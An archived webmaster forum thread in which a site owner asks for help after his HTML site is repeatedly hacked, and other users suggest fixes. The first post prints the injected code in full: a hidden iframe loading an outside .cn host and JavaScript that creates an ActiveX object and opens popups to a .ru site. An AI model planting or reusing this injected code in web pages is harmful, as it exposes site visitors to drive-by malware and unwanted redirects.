Hacker Hacked my website [Archive] - HTML Forums - Free Webmaster Forums and Help Forums

View Full Version : Hacker Hacked my website

santumondal

12-26-2008, 12:37 AM

Hi,

My site was running with HTML and has been hacked yesterday.

Hacker had written a “Code” at the “body tag” section in index.html page which have javascript extension. Also create a new “body tag” at the end of this javascript code.

**************************************************************************************************** ******************************

This code is:-

<div style="visibility:hidden"><iframe src="http://directlinkq.cn/in.cgi?27" width=100 height=80></iframe></div><script language="JavaScript">
function y(){self.focus()} self.moveTo(0,0);self.resizeTo(screen.availWidth,screen.availHeight); y();
setInterval("y()",300000);
</script>
<script language="javascript"></script>

<script>
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";

//--------------------------------------------------------------------------------

function ext()
{
if(exit)
{
exit=false;

if(!isXPSP2 && !usePopDialog)
{
window.open(popURL,"",popWindowOptions);
}
else if(!isXPSP2 && usePopDialog)
{
eval("window.showModalDialog(popURL,'',popDialogOptions)");
}
else
{
iie.launchURL(popURL);
}
}
}

//--------------------------------------------------------------------------------

function brs()
{
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}

//--------------------------------------------------------------------------------

function ver()
{
isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2) brs();
}

//--------------------------------------------------------------------------------
usePopDialog = false;
var refurl = window.location;
var popURL = 'http://cherrytv.ru/?partner=283';
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");

//--------------------------------------------------------------------------------
</script>
<body STYLE="behavior:url(#default#clientcaps)" ID="oClientCaps" onUnload="normal_exit()">

**************************************************************************************************** ******************************

Instead of clearing of index page, I have chosen to new upload.

But today I have disappointed, the same thing happened to my fresh HTML.

Is there anybody who can help me urgently?

thanks

misheck

12-26-2008, 07:34 PM

9997

12-28-2008, 09:12 AM

I hope I can be help. Have you tried changing the password for your account where the website is hosted at? If so make sure that you also delete all the user accounts or infact all user accounts with access to your website host and then set new ones.

I agree, when you found out that it was hacked, you should have immediatly changed all your passwords! If the hacker had changed the password, then you should already have a back up i assume, so just re-upload your website to a new account or host and then point your domain there! :D

drivle

12-28-2008, 10:43 AM

I wouldn't suggest that anyone tries running that code or visiting the website as they are almost certainly going to get a nasty surprise...

santumondal - what are the permissions on the file that was altered?

Anime Area

12-28-2008, 09:05 PM

I agree, when you found out that it was hacked, you should have immediatly changed all your passwords! If the hacker had changed the password, then you should already have a back up i assume, so just re-upload your website to a new account or host and then point your domain there! :D

this is the best steps to follow, first, change ur password, if u can't, use a backup and re-upload ur site somewhere else (this time with a tougher password)

and just a tip....u might want 2 take that code out....

redinferno

12-30-2008, 07:43 AM

I wouldn't suggest that anyone tries running that code or visiting the website as they are almost certainly going to get a nasty surprise...
What would that surprise be?

jenk

01-15-2009, 10:35 AM

Here is my story. In nov/dec time frame (2008) I downloaded an HTML editor - forget the name of it. The editor did not have a virus but somehow when I created the site from this editor, that same website and code as cut and paste above came in this part of my site (soaps.alaivani.com). I have a blog at alaivani.com and this part of the site has never been affected. I tried to take the code out a number of times. When I open soaps.alaivani.com I can tell the code is there because the banner image is not coming at the top of the window. Also though I had not thought of it, since this problem came up, my personal lap top has been experiencing viruses too. Are these connected? If I delete that code and start afresh would that solve this problem? the page - soaps.alaivani.com has been advertised and is listed on my products label so if I delete what's there can I still use this address? How does this code get attached to these pages?
Thank you any help is appreciated.
Jennifer
PS when others come to this site is their computer being affected because of the coding?

jenk

01-15-2009, 10:36 AM

Within soaps.alaivani.com I have several links not all pages within this address are affected. the main page is and one or two more...how is that possible?

i-CONICA

01-15-2009, 11:04 AM

Couldn't a very open CHMOD also make files changeable remotely? without needing ftp access? like if index.html was set to 777 then surely the public could write to it?

Not one hundred percent, more of a question than an answer to be honest.. :)

¥åßßå

01-15-2009, 12:09 PM

I'm going to guess that it was FCK editor in which case you may find this post ( I got hacked, please help... (http://www.fckeditor.net/forums/viewtopic.php?f=6&t=12603) ) on their forums helpful ;)

¥